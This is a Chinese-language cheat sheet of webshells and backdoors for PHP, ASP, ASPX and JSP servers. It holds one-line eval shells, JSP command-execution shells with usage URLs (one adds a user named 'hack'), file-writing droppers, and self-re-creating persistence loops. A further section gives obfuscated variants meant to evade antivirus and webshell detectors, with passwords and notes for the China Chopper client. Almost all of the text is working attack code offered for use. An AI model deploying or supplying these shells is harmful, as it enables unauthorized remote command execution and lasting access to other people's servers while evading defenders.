src马总结

一.一句话木马

php

#phpinfo马
<?php $a="phpinfo()"; eval("$a;");?> 
#短的一句话木马
<?php eval($_GET[w]);
#函数一句话木马
 <?php @call_user_func($_GET['a'],$_GET['b']);?>
 使用方法&a=system&b=whoami
没空格的马
@eval($_POST[cmd]);


直接写马->组合拳和文件包含漏洞一起组合
<?fputs(fopen("shell.php","w"),"<?php eval($_POST[x]);?>")?>

可写一句话木马的写入函数
文件包含漏洞
三个类型的一句话木马

上传马制作

php一句话木马：  <?php @eval($_POST[value]); ?>
asp一句话木马：  <%eval request ("value")%> 或  <% execute(request("value")) %>   
aspx一句话木马： <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
 
<?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
将当前目录下创建xie.php文件，并且将一句话木马写入xd.php中

aspx常见马
aspx的xls cmd马
ashx写aspx马的

<%@ WebHandler Language="C#" Class="Handler" %> 
using System; 
using System.Web; 
using System.IO; 
public class Handler : IHttpHandler { 
    public void ProcessRequest (HttpContext context) { 
        context.Response.ContentType = "text/plain";
string show="<% @Page Language=\"Jscript\"%"+"><%Response.Write(eval(Request.Item"+"[\"xiaoma\"]"+",\"unsafe\"));%>Hey web master,Have a nice day o.O? I hope so! HaHa";
        StreamWriter file1= File.CreateText(context.Server.MapPath("query.aspx")); 
        file1.Write(show); 
        file1.Flush(); 
        file1.Close();          
    }
    public bool IsReusable { 
        get { 
            return false; 
        } 
    } 
}

jsp木马

#无回显
<%Runtime.getRuntime().exec(request.getParameter("i"));%>

#一句话
＜%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%＞

使用方法
http://127.0.0.1:8080/EShop/a.jsp?i=net user hack 123 /add
有回显

<%
    if("b".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

http://127.0.0.1:8080/EShop/b.jsp?pwd=b&i=ipconfig
连接后i代命令即可

jsp一句话木马相关文档

变种马

php的

#正则表达式马
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>

//绕过<?限制的一句话-->绕<?
<script language="php">@eval($_POST[sb])</script>

#利用反引号构造一句话木马
<?php echo `$_GET['r']` ?> 

#执行系统命令的木马
<?php system($_REQUEST1);?> 


#无特征隐藏PHP一句话：
<?php session_start();
 $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

#一句话变形
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
在菜刀里写http://site/1.php?2=assert密码是1

#绕字符的一句话木马变形

<?php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 
密码是pass。


<?php $__=('>'>'<')+('>'>'<'); $_=$__/$__; $____=''; $___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__}); $_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_}); $_=$$_____; $____($_[$__]);
密码是2



ASSERT($_POST[_])，无需获取小写a）：
<?php $_=[]; $_=@"$_"; // $_='Array'; $_=$_['!'=='@']; // $_=$_[0]; $___=$_; // A $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; $___.=$__; // S $___.=$__; // S $__=$_; $__++;$__++;$__++;$__++; // E $___.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R $___.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T $___.=$__; $____='_'; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T $____.=$__; $_=$$____; $___($_[_]); // ASSERT($_POST[_]);
密码是下划线

#变形3
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');


#包含马
$filename=$_GET['xbid']; include ($filename);


#骚姿势马
①循环生成马
<?php set_time_limit(0); 
ignore_user_abort(1);
 unlink(__FILE__); //file_put_contents(__FILE__,''); 
while(1){
 file_put_contents('path/webshell.php','<?php @eval($_POST["password"]);?>'); } 
?>

②不死包含马
<?php
set_time_limit(0);
ignore_user_abort(true);
while(1){
file_put_contents(randstr().'.php',file_get_content(__FILE__));
file_get_contents("http://127.0.0.1/");
}
?>

完美一句话php马
强悍的一句话后门

大马

jsp大马
jsp马可用
jsp上传马操控的 上传马好像就这个比较优秀

二 免杀webshell

php免杀webshell
asp免杀webshell
大马集合
小马生成思路
绕过学习
写上传马的思路
过d盾马思路学习

①aspx的
<%@ Page Language="Jscript"%>
<%
var a = "un" + Char ( 115 ) + Char ( 97 ) + "fe";
var b = Char ( 82 ) + Char ( 101 ) + Char ( 113 ) + Char ( 117 ) + Char ( 101 ) + Char ( 115 ) + Char ( 116 ) + Char ( 46 ) + Char ( 73 ) + Char ( 116 ) + Char ( 101 ) + Char ( 109 ) + Char ( 91 ) + Char ( 34 ) + Char ( 77 ) + Char ( 34 ) + Char ( 93 );
var M = eval(b,a);
var T = eval(M,a);
Response.Write("Test");
%>
②
<%@ Page Language="Jscript"%>
<%
var p = Request.Item["M"];
var a = p.substring(0,1);
var b = p.substring(1,99999);
var c = "un" + Char ( 115 ) + Char ( 97 ) + "fe";
eval(a+b,c);
%>
③
<script runat="server" language="JScript">
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding(65001).

GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));

%>
#密码z

asp的

①
<%
P=request("pass")
A=mid(P,1,1)
B=mid(P,2,9999)
eval A&B
%>